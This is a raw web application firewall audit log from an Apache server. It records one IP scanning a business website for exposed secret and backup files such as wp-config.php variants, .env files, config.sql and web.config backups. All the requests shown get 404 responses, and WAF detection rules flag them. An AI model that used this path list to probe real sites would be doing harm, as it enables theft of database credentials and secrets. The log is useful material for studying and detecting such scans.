Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.new"] [unique_id "aFBqwCid3pHxA3RhGpzqGQAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.new' not found or unable to stat Stopwatch: 1750100672649543 3861 (- - -) Stopwatch2: 1750100672649543 3861; combined=2262, p1=504, p2=1677, p3=0, p4=0, p5=81, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3e48d60-Z-- --f7ffdb6f-A-- [17/Jun/2025:00:34:32.984705 +0530] aFBqwCid3pHxA3RhGpzqGgAAAAk 185.177.72.201 54678 127.0.0.1 7080 --f7ffdb6f-B-- GET /wp-config.php.dist HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f7ffdb6f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f7ffdb6f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.dist"] [unique_id "aFBqwCid3pHxA3RhGpzqGgAAAAk"] Stopwatch: 1750100672981067 3714 (- - -) Stopwatch2: 1750100672981067 3714; combined=2200, p1=473, p2=1652, p3=0, p4=0, p5=75, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7ffdb6f-Z-- --6bf58f01-A-- [17/Jun/2025:00:34:33.095016 +0530] aFBqwVJfblPUQiSn5r1hgQAAAAA 185.177.72.201 54682 127.0.0.1 7080 --6bf58f01-B-- GET /config.sql HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6bf58f01-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6bf58f01-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.sql"] [unique_id "aFBqwVJfblPUQiSn5r1hgQAAAAA"] Stopwatch: 1750100673091895 3175 (- - -) Stopwatch2: 1750100673091895 3175; combined=1837, p1=327, p2=1450, p3=0, p4=0, p5=60, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bf58f01-Z-- --19a24365-A-- [17/Jun/2025:00:34:33.205532 +0530] aFBqwZlL5_2Zd8wUdfLI8QAAAAg 185.177.72.201 54690 127.0.0.1 7080 --19a24365-B-- GET /.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --19a24365-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --19a24365-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.backup"] [unique_id "aFBqwZlL5_2Zd8wUdfLI8QAAAAg"] Stopwatch: 1750100673202414 3202 (- - -) Stopwatch2: 1750100673202414 3202; combined=1911, p1=374, p2=1476, p3=0, p4=0, p5=61, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19a24365-Z-- --cb936056-A-- [17/Jun/2025:00:34:33.316150 +0530] aFBqwY3q6eGJ2xNcTd6GuwAAAAU 185.177.72.201 54712 127.0.0.1 7080 --cb936056-B-- GET /changelog.txt.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cb936056-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --cb936056-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/changelog.txt.old"] [unique_id "aFBqwY3q6eGJ2xNcTd6GuwAAAAU"] Stopwatch: 1750100673313285 2916 (- - -) Stopwatch2: 1750100673313285 2916; combined=1641, p1=326, p2=1260, p3=0, p4=0, p5=55, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb936056-Z-- --b6e6207e-A-- [17/Jun/2025:00:34:34.202031 +0530] aFBqwk3CmevS3xeTzmojEQAAAAQ 185.177.72.201 54792 127.0.0.1 7080 --b6e6207e-B-- GET /index.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b6e6207e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b6e6207e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.php.old"] [unique_id "aFBqwk3CmevS3xeTzmojEQAAAAQ"] Stopwatch: 1750100674199117 2978 (- - -) Stopwatch2: 1750100674199117 2978; combined=1703, p1=326, p2=1317, p3=0, p4=0, p5=60, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6e6207e-Z-- --a1ffd20e-A-- [17/Jun/2025:00:34:34.312827 +0530] aFBqwlJfblPUQiSn5r1hhAAAAAA 185.177.72.201 54806 127.0.0.1 7080 --a1ffd20e-B-- GET /wp-config.php~ HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a1ffd20e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a1ffd20e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php~"] [unique_id "aFBqwlJfblPUQiSn5r1hhAAAAAA"] Stopwatch: 1750100674309862 3017 (- - -) Stopwatch2: 1750100674309862 3017; combined=1717, p1=407, p2=1255, p3=0, p4=0, p5=55, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1ffd20e-Z-- --a9b53841-A-- [17/Jun/2025:00:34:34.754544 +0530] aFBqwo3q6eGJ2xNcTd6GvgAAAAU 185.177.72.201 54854 127.0.0.1 7080 --a9b53841-B-- GET /admin/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a9b53841-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a9b53841-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/admin/.env"] [unique_id "aFBqwo3q6eGJ2xNcTd6GvgAAAAU"] Stopwatch: 1750100674751509 3088 (- - -) Stopwatch2: 1750100674751509 3088; combined=1756, p1=404, p2=1299, p3=0, p4=0, p5=53, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9b53841-Z-- --e48d5b09-A-- [17/Jun/2025:00:34:35.527338 +0530] aFBqwyid3pHxA3RhGpzqHgAAAAk 185.177.72.201 54944 127.0.0.1 7080 --e48d5b09-B-- GET /readme.md.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e48d5b09-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e48d5b09-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".md.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".md.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/readme.md.bak"] [unique_id "aFBqwyid3pHxA3RhGpzqHgAAAAk"] Stopwatch: 1750100675524421 2969 (- - -) Stopwatch2: 1750100675524421 2969; combined=1656, p1=330, p2=1267, p3=0, p4=0, p5=59, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e48d5b09-Z-- --df9b6662-A-- [17/Jun/2025:00:34:35.748996 +0530] aFBqw5VkCcfT-Z8NQYyUxQAAAAc 185.177.72.201 54982 127.0.0.1 7080 --df9b6662-B-- GET /backups/private/.env.local HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --df9b6662-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --df9b6662-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/backups/private/.env.local"] [unique_id "aFBqw5VkCcfT-Z8NQYyUxQAAAAc"] Stopwatch: 1750100675745857 3191 (- - -) Stopwatch2: 1750100675745857 3191; combined=1912, p1=399, p2=1461, p3=0, p4=0, p5=52, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --df9b6662-Z-- --52df5e72-A-- [17/Jun/2025:00:34:36.192100 +0530] aFBqxFJfblPUQiSn5r1hhwAAAAA 185.177.72.201 55028 127.0.0.1 7080 --52df5e72-B-- GET /readme.txt.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --52df5e72-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --52df5e72-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/readme.txt.bak"] [unique_id "aFBqxFJfblPUQiSn5r1hhwAAAAA"] Stopwatch: 1750100676188986 3179 (- - -) Stopwatch2: 1750100676188986 3179; combined=1889, p1=434, p2=1398, p3=0, p4=0, p5=57, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52df5e72-Z-- --d258ab04-A-- [17/Jun/2025:00:34:36.746119 +0530] aFBqxFJfblPUQiSn5r1hiAAAAAA 185.177.72.201 55086 127.0.0.1 7080 --d258ab04-B-- GET /staging/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d258ab04-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d258ab04-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/staging/.env"] [unique_id "aFBqxFJfblPUQiSn5r1hiAAAAAA"] Stopwatch: 1750100676742955 3219 (- - -) Stopwatch2: 1750100676742955 3219; combined=1882, p1=407, p2=1421, p3=0, p4=0, p5=54, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d258ab04-Z-- --a9baaa3a-A-- [17/Jun/2025:00:34:37.078392 +0530] aFBqxSid3pHxA3RhGpzqIQAAAAk 185.177.72.201 55118 127.0.0.1 7080 --a9baaa3a-B-- GET /web.config.bakup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a9baaa3a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a9baaa3a-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.bakup"] [unique_id "aFBqxSid3pHxA3RhGpzqIQAAAAk"] Stopwatch: 1750100677075310 3136 (- - -) Stopwatch2: 1750100677075310 3136; combined=1713, p1=389, p2=1241, p3=0, p4=0, p5=83, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9baaa3a-Z-- --3a39cd34-A-- [17/Jun/2025:00:34:37.188176 +0530] aFBqxVJfblPUQiSn5r1hiQAAAAA 185.177.72.201 55124 127.0.0.1 7080 --3a39cd34-B-- GET /admin.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3a39cd34-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3a39cd34-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/admin.php.backup"] [unique_id "aFBqxVJfblPUQiSn5r1hiQAAAAA"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/admin.php.backup' not found or unable to stat Stopwatch: 1750100677185590 2663 (- - -) Stopwatch2: 1750100677185590 2663; combined=1620, p1=297, p2=1251, p3=0, p4=0, p5=72, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a39cd34-Z-- --1483dd43-A-- [17/Jun/2025:00:34:37.630733 +0530] aFBqxU3CmevS3xeTzmojFwAAAAQ 185.177.72.201 55174 127.0.0.1 7080 --1483dd43-B-- GET /config.inc HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1483dd43-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1483dd43-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc"] [unique_id "aFBqxU3CmevS3xeTzmojFwAAAAQ"] Stopwatch: 1750100677627593 3192 (- - -) Stopwatch2: 1750100677627593 3192; combined=1787, p1=363, p2=1368, p3=0, p4=0, p5=56, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1483dd43-Z-- --efc2a57c-A-- [17/Jun/2025:00:34:37.852909 +0530] aFBqxX3hoSwVUy254pH0KwAAACQ 185.177.72.201 55190 127.0.0.1 7080 --efc2a57c-B-- GET /wp-config.php_backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --efc2a57c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --efc2a57c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_backup"] [unique_id "aFBqxX3hoSwVUy254pH0KwAAACQ"] Stopwatch: 1750100677849464 3518 (- - -) Stopwatch2: 1750100677849464 3518; combined=2109, p1=453, p2=1585, p3=0, p4=0, p5=71, sr=112, sw=0, l=0, 